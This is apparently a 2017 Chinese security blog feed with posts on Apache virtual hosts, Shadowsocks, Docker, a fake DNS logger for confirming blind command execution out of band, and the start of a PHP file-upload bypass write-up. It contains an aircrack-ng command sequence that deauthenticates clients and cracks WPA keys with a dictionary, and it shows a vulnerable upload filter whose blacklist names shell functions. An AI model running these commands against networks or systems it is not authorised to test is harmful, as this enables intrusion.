    <published>2017-03-13T06:23:24.000Z</published>
    <updated>2017-03-13T06:29:58.911Z</updated>
    
    <content type="html"><![CDATA[<p>大致提一下，Apache实现多主机的方式有多种：<br>1)基于IP地址的虚拟主机配置，<br>2) 基于IP和多端口的虚拟主机配置，<br>3)单个IP地址的服务器上基于域名的虚拟主机配置，<br>4)在多个IP地址的服务器上配置基于域名的虚拟主机。</p>
<h2 id="绑定多端口方式"><a href="#绑定多端口方式" class="headerlink" title="绑定多端口方式"></a>绑定多端口方式</h2><h4 id="设置-Apache-监听新端口"><a href="#设置-Apache-监听新端口" class="headerlink" title="设置 Apache 监听新端口"></a>设置 Apache 监听新端口</h4><p>打开 /etc/apache2/ports.conf 文件，在 Listen 80 下追加监听新的端口号，比如 8888</p>
<pre><code>Listen 8888
</code></pre><h4 id="设置虚拟主机（新端口主机）对应目录"><a href="#设置虚拟主机（新端口主机）对应目录" class="headerlink" title="设置虚拟主机（新端口主机）对应目录"></a>设置虚拟主机（新端口主机）对应目录</h4><p>打开 /etc/apache2/sites-available/000-default.conf 文件，新增加如下内容：</p>
<pre><code>&lt;VirtualHost *:8888&gt;
ServerName localhost:8888
DocumentRoot &quot;/dir_path&quot;
&lt;/VirtualHost&gt;
</code></pre><h4 id="重启-Apache2-服务"><a href="#重启-Apache2-服务" class="headerlink" title="重启 Apache2 服务"></a>重启 Apache2 服务</h4><p>执行命令，重启Apache2</p>
<pre><code>service apache2 restart
</code></pre><p>浏览器访问： <a href="http://ip:8888" target="_blank" rel="external">http://ip:8888</a> ，若提示：</p>
<pre><code>Forbidden
You don&apos;t have permission to access / on this server.
</code></pre><p>是因为虚拟主机目录为非apache安装目录下的htdocs，违反了apache对默认对网站根访问权限。需要设置该目录允许访问。</p>
<h4 id="设置目录允许访问"><a href="#设置目录允许访问" class="headerlink" title="设置目录允许访问"></a>设置目录允许访问</h4><p>打开 /etc/apache2/apache2.conf ，新添加如下配置：</p>
<pre><code>&lt;Directory /dir_path&gt;
        Options Indexes FollowSymLinks
        AllowOverride None
        Require all granted
&lt;/Directory&gt;
</code></pre><h2 id="绑定多主机"><a href="#绑定多主机" class="headerlink" title="绑定多主机"></a>绑定多主机</h2><p>在 /etc/apache2/site-enable/目录下新建domain_x.conf配置文件，内容如下：</p>
<virtualhost *:80=""><br>        ServerName xxx.com<br>        ServerAdmin webmaster@localhost<br>        DocumentRoot /var/www/html/xxx<br>        ErrorLog ${APACHE_LOG_DIR}/error_xxx.log<br>        CustomLog ${APACHE_LOG_DIR}/access_xxx.log combined<br></virtualhost>

<p>在domain 厂商设置好domain 的 A 记录即可。</p>
<blockquote>
<p>参考： <a href="http://blog.csdn.net/robertsong2004/article/details/46830799" target="_blank" rel="external">http://blog.csdn.net/robertsong2004/article/details/46830799</a></p>
</blockquote>
]]></content>
    
    <summary type="html">
    
      &lt;p&gt;大致提一下，Apache实现多主机的方式有多种：&lt;br&gt;1)基于IP地址的虚拟主机配置，&lt;br&gt;2) 基于IP和多端口的虚拟主机配置，&lt;br&gt;3)单个IP地址的服务器上基于域名的虚拟主机配置，&lt;br&gt;4)在多个IP地址的服务器上配置基于域名的虚拟主机。&lt;/p&gt;
&lt;h2 id
    
    </summary>
    
    
  </entry>
  
  <entry>
    <title>Shadowsocks服务端配置命令</title>
    <link href="http://www.evilclay.com/2017/03/11/Shadowsocks%E6%9C%8D%E5%8A%A1%E7%AB%AF%E9%85%8D%E7%BD%AE%E5%91%BD%E4%BB%A4/"/>
    <id>http://www.evilclay.com/2017/03/11/Shadowsocks服务端配置命令/</id>
    <published>2017-03-11T03:38:37.000Z</published>
    <updated>2017-03-11T03:42:04.075Z</updated>
    
    <content type="html"><![CDATA[<ol>
<li><p>安装 服务端<br>pip install shadowsocks</p>
</li>
<li><p>创建 /etc/shadowsocks/，进入并添加 config.json文件，内容如下：<br>{<br>服务器IP地址需要设置为0.0.0.0<br>“server”:”0.0.0.0”,<br>“server_port”:8838,<br>“local_port”:1080,<br>“password”:”pass”,<br>“timeout”:600,<br>“method”:”aes-256-cfb”<br>}</p>
</li>
<li><p>安装aes加密相关库<br>apt-get install python-m2crypto</p>
</li>
<li><p>设置开机启动  打开 /etc/rc.local，并添加如下内容：<br>/usr/local/bin/ssserver -c /etc/shadowsocks/config.json</p>
</li>
</ol>
]]></content>
    
    <summary type="html">
    
      &lt;ol&gt;
&lt;li&gt;&lt;p&gt;安装 服务端&lt;br&gt;pip install shadowsocks&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;创建 /etc/shadowsocks/，进入并添加 config.json文件，内容如下：&lt;br&gt;{&lt;br&gt;服务器IP地址需要设置为0.0.0.0&lt;br
    
    </summary>
    
    
  </entry>
  
  <entry>
    <title>WIFI密码-破解命令</title>
    <link href="http://www.evilclay.com/2017/02/21/WIFI%E5%AF%86%E7%A0%81-%E7%A0%B4%E8%A7%A3%E5%91%BD%E4%BB%A4/"/>
    <id>http://www.evilclay.com/2017/02/21/WIFI密码-破解命令/</id>
    <published>2017-02-21T13:08:39.000Z</published>
    <updated>2017-02-21T13:13:18.041Z</updated>
    
    <content type="html"><![CDATA[<p>自己路由器坏了，暂时也懒得修，想起还有一块无线网卡，直接爆破WIFI得了。</p>
<p>使用虚拟机识别无线网卡的话注意两点：</p>
<ol>
<li>service.msc 开启 VM USB相关的服务</li>
<li>虚拟机设置页面USB控制器的三个选项全都点上</li>
</ol>
<p>要不，要不插上网卡会没反应~~</p>
<h4 id="列出支持监控模式的网卡"><a href="#列出支持监控模式的网卡" class="headerlink" title="列出支持监控模式的网卡"></a>列出支持监控模式的网卡</h4><p>airmon-ng</p>
<h4 id="启用wlan0"><a href="#启用wlan0" class="headerlink" title="启用wlan0"></a>启用wlan0</h4><p>airmon-ng start wlan0</p>
<h4 id="列出所有的SSID"><a href="#列出所有的SSID" class="headerlink" title="列出所有的SSID"></a>列出所有的SSID</h4><p>airodump-ng wlan0mon</p>
<h4 id="抓BSSID-20-F4-1B-B3-E5-12-信道2的握手包-能看到已经连接的客户端"><a href="#抓BSSID-20-F4-1B-B3-E5-12-信道2的握手包-能看到已经连接的客户端" class="headerlink" title="抓BSSID　20:F4:1B:B3:E5:12　信道2的握手包(能看到已经连接的客户端)"></a>抓BSSID　20:F4:1B:B3:E5:12　信道2的握手包(能看到已经连接的客户端)</h4><p>airodump-ng -c 2 –bssid 20:F4:1B:B3:E5:12 -w ~/ wlan0mon</p>
<h4 id="强制BSSID20-F4-1B-B3-E5-12-客户端-B4-0B-44-91-74-B9-下线"><a href="#强制BSSID20-F4-1B-B3-E5-12-客户端-B4-0B-44-91-74-B9-下线" class="headerlink" title="强制BSSID20:F4:1B:B3:E5:12　客户端　B4:0B:44:91:74:B9　下线"></a>强制BSSID20:F4:1B:B3:E5:12　客户端　B4:0B:44:91:74:B9　下线</h4><p>aireplay-ng -0 2 -a 20:F4:1B:B3:E5:12 -c B4:0B:44:91:74:B9 wlan0mon</p>
<p>####　使用字典破解BSSID　20:F4:1B:B3:E5:12　的WIFI密码<br>aircrack-ng -a2 -b 20:F4:1B:B3:E5:12 -w ~/wifi-crack/pass.txt ~/wifi-crack/*.cap</p>
]]></content>
    
    <summary type="html">
    
      &lt;p&gt;自己路由器坏了，暂时也懒得修，想起还有一块无线网卡，直接爆破WIFI得了。&lt;/p&gt;
&lt;p&gt;使用虚拟机识别无线网卡的话注意两点：&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;service.msc 开启 VM USB相关的服务&lt;/li&gt;
&lt;li&gt;虚拟机设置页面USB控制器的三个选项全都点上&lt;/
    
    </summary>
    
    
  </entry>
  
  <entry>
    <title>SQLALchemy问题调试的一点想法</title>
    <link href="http://www.evilclay.com/2017/02/18/SQLALchemy%E9%97%AE%E9%A2%98%E8%B0%83%E8%AF%95%E7%9A%84%E4%B8%80%E7%82%B9%E6%83%B3%E6%B3%95/"/>
    <id>http://www.evilclay.com/2017/02/18/SQLALchemy问题调试的一点想法/</id>
    <published>2017-02-18T15:02:29.000Z</published>
    <updated>2017-02-18T15:04:12.362Z</updated>
    
    <content type="html"><![CDATA[<p>这周在处理工作的时候遇到了一个比较棘手的问题，加上前段时间看到的一个面试题“当你遇到的问题在google上搜不到时你会如何去做”，针对这个问题处理的时间比较长，中间也花了一些时间纠结该如何去做，想把这次处理问题的方法记录下来，提醒自己以后尽可能的高效处理遇到的BUG。</p>
<p>不提及具体的问题，这里简单说快速处理问题的几点想法：</p>
<p>1、 逐步定位问题可能的原因，一个个排除问题可能出现的组件。</p>
<p>2、 单独的小程序去复现BUG测试方法，而不是在原有大体量的程序下。</p>
<p>3、 最重要的资料都会在官网找得到来源，虽然不一定能获得解决问题的方法，说不定会找到问题的原因。</p>
<p>4、 解决问题的过程中难免会接触新的知识，保持好奇心去弄明白它。</p>
<p>5、 当前找到的解决方案不一定是最优的，但在功能、效率上来说一定是最符合现状的，心里保留余地，后期可能会因为新的姿势使用别的解决方案。</p>
]]></content>
    
    <summary type="html">
    
      &lt;p&gt;这周在处理工作的时候遇到了一个比较棘手的问题，加上前段时间看到的一个面试题“当你遇到的问题在google上搜不到时你会如何去做”，针对这个问题处理的时间比较长，中间也花了一些时间纠结该如何去做，想把这次处理问题的方法记录下来，提醒自己以后尽可能的高效处理遇到的BUG。&lt;/p
    
    </summary>
    
    
      <category term="想法" scheme="http://www.evilclay.com/tags/%E6%83%B3%E6%B3%95/"/>
    
  </entry>
  
  <entry>
    <title>DockerHelloWorld分享备忘录</title>
    <link href="http://www.evilclay.com/2017/01/05/DockerHelloWorld%E5%88%86%E4%BA%AB%E5%A4%87%E5%BF%98%E5%BD%95/"/>
    <id>http://www.evilclay.com/2017/01/05/DockerHelloWorld分享备忘录/</id>
    <published>2017-01-05T02:39:19.000Z</published>
    <updated>2017-01-05T02:40:23.139Z</updated>
    
    <content type="html"><![CDATA[<h2 id="Doceker-HelloWorld"><a href="#Doceker-HelloWorld" class="headerlink" title="Doceker HelloWorld"></a>Doceker HelloWorld</h2><h3 id="一些概念"><a href="#一些概念" class="headerlink" title="一些概念"></a>一些概念</h3><h4 id="Docker"><a href="#Docker" class="headerlink" title="Docker"></a>Docker</h4><p>一种轻量型的容器解决方案，通过Docker化技术可以把应用“一次封装，到处运行”，免去了手工装各种环境的体力劳动，这种容器化技术通过镜像和容器两个主要部件实现。</p>
<h4 id="镜像-和-容器"><a href="#镜像-和-容器" class="headerlink" title="镜像 和 容器"></a>镜像 和 容器</h4><p>镜像和容器的关系 相当于 面向对象语言的 类 与 对象。</p>
<p>也就是说，加载镜像生成一个容器，同是又可以把新生成的容器经过修改后重新封装成一个镜像共享给大家使用。<br>对容器修改后需要commit生成自己的镜像，否则下次加载这个镜像时修改丢失。</p>
<h4 id="Docker-Client"><a href="#Docker-Client" class="headerlink" title="Docker Client"></a>Docker Client</h4><p>可以把与Docker Deamon进行通讯的所有接口都理解为 Docker Client,可以是命令行程序，可以是C#(支持 Windows)、Java、Go、Ruby、JavaScript提供的接口。</p>
<h4 id="Docker-Daemon"><a href="#Docker-Daemon" class="headerlink" title="Docker Daemon"></a>Docker Daemon</h4><p>Docker最核心的后台进程，通过API方式接收并处理客户端的请求，进行操作时 要先保证 deamon 进程已经运行，如下：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/docker-deamon.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure>
<h4 id="仓库"><a href="#仓库" class="headerlink" title="仓库"></a>仓库</h4><p>集中存放镜像的场所。</p>
<p>最大的仓库 Docker Hub，国内的公开仓库有 中科大<a href="https://lug.ustc.edu.cn/wiki/mirrors/help/docker。" target="_blank" rel="external">https://lug.ustc.edu.cn/wiki/mirrors/help/docker。</a></p>
<h4 id="Dockerfile"><a href="#Dockerfile" class="headerlink" title="Dockerfile"></a>Dockerfile</h4><p>包含各种docker指令的一个文本文件，通过这个文件创建一个docker镜像。推荐使用这种方式分享docker镜像，可以让别人清楚的了解该镜像装了哪些环境。</p>
<h3 id="Docker-vs-Vmware"><a href="#Docker-vs-Vmware" class="headerlink" title="Docker vs Vmware"></a>Docker vs Vmware</h3><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/dockervm.gif" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure>
<h3 id="Docker-使用场景"><a href="#Docker-使用场景" class="headerlink" title="Docker 使用场景"></a>Docker 使用场景</h3><pre><code>对于运维来说，可以做到应用的规模化，自动化，异构化部署。
对于开发来说，提供了一个统一的开发环境，方便团队之间协同开发。
对于我们来说，....
</code></pre><h3 id="Docker-常用命令"><a href="#Docker-常用命令" class="headerlink" title="Docker 常用命令"></a>Docker 常用命令</h3><pre><code>docker info  显示 docker 系统信息 镜像数，容器数
docker stat  显示已经运行的 docker 容器 CPU 内存 IO信息
docker version  显示 docker 版本（CS）信息

docker images  显示系统中所有镜像
docker ps   显示正在运行的镜像，包含容器ID
docker search ubuntu   搜索docker仓库中 ubuntu 镜像
docker pull  username/mechine  从仓库下载镜像文件
docker push hujb2000/node:v2  把镜像推到自己的仓库
docker rmi  镜像ID  删除镜像
docker build -t anka9080/tagname .   在当前目录下查找Dockerfile生成镜像
docker run -d nickistre/ubuntu-lamp   后台模式(-d)启动容器
docker run -d -p 8000:80 anka9080/vulapps:tools_xunfeng   后台开启容器并指定端口映射
docker run -it mattdm/fedora /bin/bash   进入容器的交互式shell （-t终端 -i 输出输入重定向）
docker run ubuntu:15.10 /bin/echo &quot;Hello world&quot;  Docker 以 ubuntu15.10 镜像创建一个新容器，然后在容器里执行 bin/echo &quot;Hello world&quot;，然后输出结果。

docker logs 2b1b7a428627/cointainer_name  对后台运行容器的输出重定向显示到当前shell
docker stop 2b1b7a428627/cointainer_name   关闭容器
docker port 7a38a1ad55c6   查看指定 （ID或者名字）容器的某个确定端口映射到宿主机的端口号
docker rm determined_swanson    删除容器
docker exec -it &lt;容器ID&gt; /bin/bash   进入正在运行容器的shell
docker top determined_swanson  查看容器内部的进程


docker cp foo.txt mycontainer:/foo.txt  拷贝文件到 docker 容器
docker cp mycontainer:/foo.txt foo.txt  从容器冲拷贝文件到宿主机
</code></pre>]]></content>
    
    <summary type="html">
    
      &lt;h2 id=&quot;Doceker-HelloWorld&quot;&gt;&lt;a href=&quot;#Doceker-HelloWorld&quot; class=&quot;headerlink&quot; title=&quot;Doceker HelloWorld&quot;&gt;&lt;/a&gt;Doceker HelloWorld&lt;/h2&gt;&lt;h3 id=&quot;一
    
    </summary>
    
    
      <category term="Docker" scheme="http://www.evilclay.com/tags/Docker/"/>
    
  </entry>
  
  <entry>
    <title>FakeDNSServer - 轻量级DNSLog查询工具</title>
    <link href="http://www.evilclay.com/2017/01/04/FakeDNSServer-%E8%BD%BB%E9%87%8F%E7%BA%A7DNSLog%E6%9F%A5%E8%AF%A2%E5%B7%A5%E5%85%B7/"/>
    <id>http://www.evilclay.com/2017/01/04/FakeDNSServer-轻量级DNSLog查询工具/</id>
    <published>2017-01-04T15:19:04.000Z</published>
    <updated>2017-01-05T05:46:16.618Z</updated>
    
    <content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>最近研究了类似盲注类命令执行没有回显的情况的处理方式，听了No老师的一些实战经验，手动搭建了DNSLog程序和一个简易的DNSServer，当做笔记记录下来啦。</p>
<p>若遇到命令执行没有回显的话，如何来验证命令执行是否真的成功了呢？</p>
<p>大牛告诉我是有三种方式可以去验证的：</p>
<ul>
<li>使用 ICMP 协议（Ping命令）</li>
<li>使用 HTTP 协议 （发送 HTTP 请求）</li>
<li>使用 DNS 协议 （发送DNS查询请求）</li>
</ul>
<p>第一种方式可以验证命令能够执行，但是不能够把命令的回显带过来。</p>
<p>在Linux需要设置iptables才能把icmp的请求写入到日志文件里，当然直接开 tcpdump 或者 wireshark 这种抓包工具也能能看到有谁 ping 了你的主机的。</p>
<pre><code>TCPDump命令：
tcpdump -i eth0 icmp
</code></pre><p>若想永久保存ICMP信息，建议设置 iptables ：</p>
<pre><code>iptables -I INPUT -p icmp --icmp-type 8 -m state  --state NEW,ESTABLISHED,RELATED -j LOG --log-level=1 --log-prefix &quot;Ping Request &quot;
// 会把所有的ICMP请求写入到 iptables 的日志文件中
// Ubuntu/Debian日志位置:  /var/log/kern.log
// CentOS/RHEL/Fedora日志位置:  /var/log/messages
</code></pre><p>这里是其他主机发起一次ping请求后 Kali（Debian）主机的/var/log/kern.log 输出：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/icmp_log.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure>
<p>第二种需要自己搭建一个HTTP服务器，然后去查Log就可以看到你在靶机发送的请求，一般在不能联网的内网的时候这个方法就比较尴尬了，也有可能HTTP协议被封掉。</p>
<p>这里使用 curl 发起一个带 命令执行的HTTP 请求记录，查看日志信息：</p>
<pre><code>vim /var/log/apache2/access.log
</code></pre><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/http_curl_apache_log.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure>
<p>第三种需要搭建一个轻量型的DNS服务器，当然能接受到DNS请求验证命令执行就可以了，至于解不解析DNS请求看你心情了，而且DNS协议一般都不会被封，这篇文章主要记录的也是这种姿势。</p>
<p>下面有请神器上场 ~</p>
<p>BugScanTeam 开源的 DNSLog 程序，简直懒人福利有木有，README已经写得够详细了，不多说了，这是 Git 地址 <a href="https://github.com/bugscanteam/dnslog/" target="_blank" rel="external">https://github.com/bugscanteam/dnslog/</a></p>
<p>在这里我就小小的提示下 需要方便的自定义DNS服务器的域名提供商请找新网（本人亲测万网，Godaddy需要认证，最后是问了Yan表哥才知道的 - -）</p>
<p>后面自己参照SimmpleDNSServer写了一个小的DNS服务器。</p>
<p>可以输出 DNS请求的来源 IP，Port 和请求的域名信息。</p>
<p>并不能实现真正的DNS解析！</p>
<p>并不能实现真正的DNS解析！</p>
<p>并不能实现真正的DNS解析！</p>
<h2 id="运行"><a href="#运行" class="headerlink" title="运行"></a>运行</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">print</span> <span class="string">"Usage:  python fake_dns_server.py"</span></div><div class="line"><span class="keyword">print</span> <span class="string">""</span></div><div class="line"><span class="keyword">print</span> <span class="string">"并没有提供DNS解析功能，直接打印发起请求的IP，Port和需要解析的域名 :P"</span></div><div class="line"><span class="keyword">print</span> <span class="string">""</span></div></pre></td></tr></table></figure>
<p>在本机使用 nslookup 命令测试命令执行效果如下：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/fake_dns_log.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure>
<h2 id="代码"><a href="#代码" class="headerlink" title="代码"></a>代码</h2><p>代码 GitHub 地址： <a href="https://github.com/Evi1CLAY/CoolPool/tree/master/Python/FakeDNSServer" target="_blank" rel="external">https://github.com/Evi1CLAY/CoolPool/tree/master/Python/FakeDNSServer</a></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div></pre></td><td class="code"><pre><div class="line"><span class="comment">#!/usr/bin/env python</span></div><div class="line"><span class="comment"># coding: utf-8</span></div><div class="line"><span class="comment"># author: Anka9080</span></div><div class="line"><span class="comment"># mail: funsociety.bat@gmail.com</span></div><div class="line"></div><div class="line"><span class="comment"># 说明：</span></div><div class="line"><span class="comment"># 没有 DNSLog 功能强大，一个轻便型 伪DNS 服务器</span></div><div class="line"><span class="comment"># 可以配合 nslookup 命令 显示没有回显类漏洞的命令执行结果</span></div><div class="line"><span class="comment"># 不能实现真正的DNS解析，直接打印请求的IP，Port和需要解析的域名</span></div><div class="line"><span class="comment"># 说白了就是一个UDP的socket绑定在53端口循环接收DNS请求信息并格式化输出 xD</span></div><div class="line"></div><div class="line"><span class="keyword">import</span> sys</div><div class="line"><span class="keyword">import</span> socket</div><div class="line"><span class="keyword">import</span> thread</div><div class="line"></div><div class="line"><span class="class"><span class="keyword">class</span> <span class="title">DNSQuery</span><span class="params">(object)</span>:</span></div><div class="line">    <span class="string">"""</span></div><div class="line">    DNS请求解析类</div><div class="line">    from http://code.activestate.com/recipes/491264-mini-fake-dns-server/</div><div class="line">    """</div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__init__</span><span class="params">(self, data)</span>:</span></div><div class="line">        self.data = data</div><div class="line">        self.domain = <span class="string">''</span></div><div class="line"></div><div class="line">        tipo = (ord(data[<span class="number">2</span>]) &gt;&gt; <span class="number">3</span>) &amp; <span class="number">15</span>   <span class="comment"># Opcode bits</span></div><div class="line">        <span class="keyword">if</span> tipo == <span class="number">0</span>:                     <span class="comment"># Standard query</span></div><div class="line">            ini = <span class="number">12</span></div><div class="line">            lon = ord(data[ini])</div><div class="line">            <span class="keyword">while</span> lon != <span class="number">0</span>:</div><div class="line">                self.domain += data[ini+<span class="number">1</span>:ini+lon+<span class="number">1</span>]+<span class="string">'.'</span></div><div class="line">                ini += lon+<span class="number">1</span></div><div class="line">                lon = ord(data[ini])</div><div class="line"></div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">usage</span><span class="params">()</span>:</span></div><div class="line">    <span class="keyword">print</span> <span class="string">""</span></div><div class="line">    <span class="keyword">print</span> <span class="string">"Usage:  python fake_dns_server.py"</span></div><div class="line">    <span class="keyword">print</span> <span class="string">""</span></div><div class="line">    <span class="keyword">print</span> <span class="string">"并没有提供DNS解析功能，直接打印发起请求的IP，Port和需要解析的域名 :P"</span></div><div class="line">    <span class="keyword">print</span> <span class="string">""</span></div><div class="line">    sys.exit(<span class="number">1</span>)</div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">print_dns_query</span><span class="params">(data, addr)</span>:</span></div><div class="line">    p=DNSQuery(data)</div><div class="line">    ip = addr[<span class="number">0</span>]</div><div class="line">    port = addr[<span class="number">1</span>]</div><div class="line">    <span class="keyword">print</span> <span class="string">'From &#123;&#125;:&#123;&#125; DNSQuery -&gt; &#123;&#125;'</span>.format(ip,port,p.domain)</div><div class="line"></div><div class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</div><div class="line">    <span class="keyword">try</span>:</div><div class="line">        udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) <span class="comment"># 创建一个UDP IPv4型 Socket</span></div><div class="line">        udps.bind((<span class="string">''</span>, <span class="number">53</span>))  <span class="comment"># 绑定 53 端口</span></div><div class="line">    <span class="keyword">except</span> Exception, e:</div><div class="line">        <span class="keyword">print</span> <span class="string">"Failed to create socket on UDP port 53:"</span>, e</div><div class="line">        sys.exit(<span class="number">1</span>)</div><div class="line"></div><div class="line">    <span class="keyword">print</span> <span class="string">'\nFake DNS Server Started &gt; ... \n'</span></div><div class="line">    <span class="keyword">try</span>:</div><div class="line">        <span class="keyword">while</span> <span class="number">1</span>:</div><div class="line">            data, addr = udps.recvfrom(<span class="number">1024</span>)</div><div class="line">            thread.start_new_thread(print_dns_query, (data, addr))</div><div class="line">    <span class="keyword">except</span> KeyboardInterrupt:</div><div class="line">        <span class="keyword">print</span> <span class="string">'\n^C, Exit!'</span></div><div class="line">    <span class="keyword">except</span> Exception, e:</div><div class="line">        <span class="keyword">print</span> <span class="string">'\nError: %s'</span> % e</div><div class="line">    <span class="keyword">finally</span>:</div><div class="line">        udps.close()</div></pre></td></tr></table></figure>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><ol>
<li><p><a href="https://ricterz.me/posts/%E7%AC%94%E8%AE%B0:%20Data%20Retrieval%20over%20DNS%20in%20SQL%20Injection%20Attacks" target="_blank" rel="external">https://ricterz.me/posts/%E7%AC%94%E8%AE%B0:%20Data%20Retrieval%20over%20DNS%20in%20SQL%20Injection%20Attacks</a></p>
</li>
<li><p><a href="http://code.activestate.com/recipes/491264-mini-fake-dns-server/" target="_blank" rel="external">http://code.activestate.com/recipes/491264-mini-fake-dns-server/</a></p>
</li>
<li><p><a href="http://serverfault.com/questions/448541/how-to-know-who-ping-my-computer" target="_blank" rel="external">http://serverfault.com/questions/448541/how-to-know-who-ping-my-computer</a></p>
</li>
</ol>
]]></content>
    
    <summary type="html">
    
      &lt;h2 id=&quot;前言&quot;&gt;&lt;a href=&quot;#前言&quot; class=&quot;headerlink&quot; title=&quot;前言&quot;&gt;&lt;/a&gt;前言&lt;/h2&gt;&lt;p&gt;最近研究了类似盲注类命令执行没有回显的情况的处理方式，听了No老师的一些实战经验，手动搭建了DNSLog程序和一个简易的DNSServer，
    
    </summary>
    
    
      <category term="DNSLog" scheme="http://www.evilclay.com/tags/DNSLog/"/>
    
      <category term="DNSServer" scheme="http://www.evilclay.com/tags/DNSServer/"/>
    
  </entry>
  
  <entry>
    <title>一次文件上传绕过笔记</title>
    <link href="http://www.evilclay.com/2017/01/03/%E4%B8%80%E6%AC%A1%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E7%AC%94%E8%AE%B0/"/>
    <id>http://www.evilclay.com/2017/01/03/一次文件上传绕过笔记/</id>
    <published>2017-01-02T16:34:46.000Z</published>
    <updated>2017-01-04T16:47:50.529Z</updated>
    
    <content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>No老师之前给了个 PHP 上传脚本，正好趁着晚上没事做研究了一下。<br>因为这次直接拿到了源代码，绕过的过程思路很清晰，倒是真正绕过后感觉看上去写的挺”严谨”的代码深挖下去总会有 Bug 的，除此之外，学习到一些很有用的东西，特地记录下。</p>
<h2 id="上传代码"><a href="#上传代码" class="headerlink" title="上传代码"></a>上传代码</h2><p>先贴出上传代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line">$str = end(explode(<span class="string">"."</span>,$_FILES[<span class="string">'file'</span>][<span class="string">'name'</span>]));</div><div class="line"><span class="keyword">if</span>($str!=<span class="string">"php"</span> <span class="keyword">and</span> $str!=<span class="string">"asp"</span> <span class="keyword">and</span> $str!=<span class="string">"jsp"</span> <span class="keyword">and</span> $str!=<span class="string">"aspx"</span>)</div><div class="line">  &#123;</div><div class="line">  <span class="keyword">if</span> ($_FILES[<span class="string">"file"</span>][<span class="string">"error"</span>] &gt; <span class="number">0</span>)</div><div class="line">    &#123;</div><div class="line">    <span class="keyword">echo</span> <span class="string">"Return Code: "</span> . $_FILES[<span class="string">"file"</span>][<span class="string">"error"</span>] . <span class="string">"&lt;br /&gt;"</span>;</div><div class="line">    &#125;</div><div class="line">  <span class="keyword">else</span></div><div class="line">    &#123;</div><div class="line">    $str=file_get_contents($_FILES[<span class="string">'file'</span>][<span class="string">'tmp_name'</span>]);</div><div class="line">    $pre = <span class="string">"/(\&lt;\? |\?\&gt;|\&lt;\%|[$]_GET|[$]_POST|[$]_COOKIE|passthru|open|[$]_FILES|system|eval|exec|assert)/i"</span>;</div><div class="line">    <span class="keyword">if</span>(preg_match($pre,$str))</div><div class="line">    &#123;<span class="keyword">echo</span> <span class="string">'WTF!'</span>;&#125;</div><div class="line">    <span class="keyword">else</span></div><div class="line">    &#123;</div><div class="line">    <span class="keyword">if</span> (file_exists(<span class="string">"upload/"</span> . $_FILES[<span class="string">"file"</span>][<span class="string">"name"</span>]))</div><div class="line">      &#123;</div><div class="line">      <span class="keyword">echo</span> $_FILES[<span class="string">"file"</span>][<span class="string">"name"</span>] . <span class="string">" already exists. "</span>;</div><div class="line">      &#125;</div><div class="line">    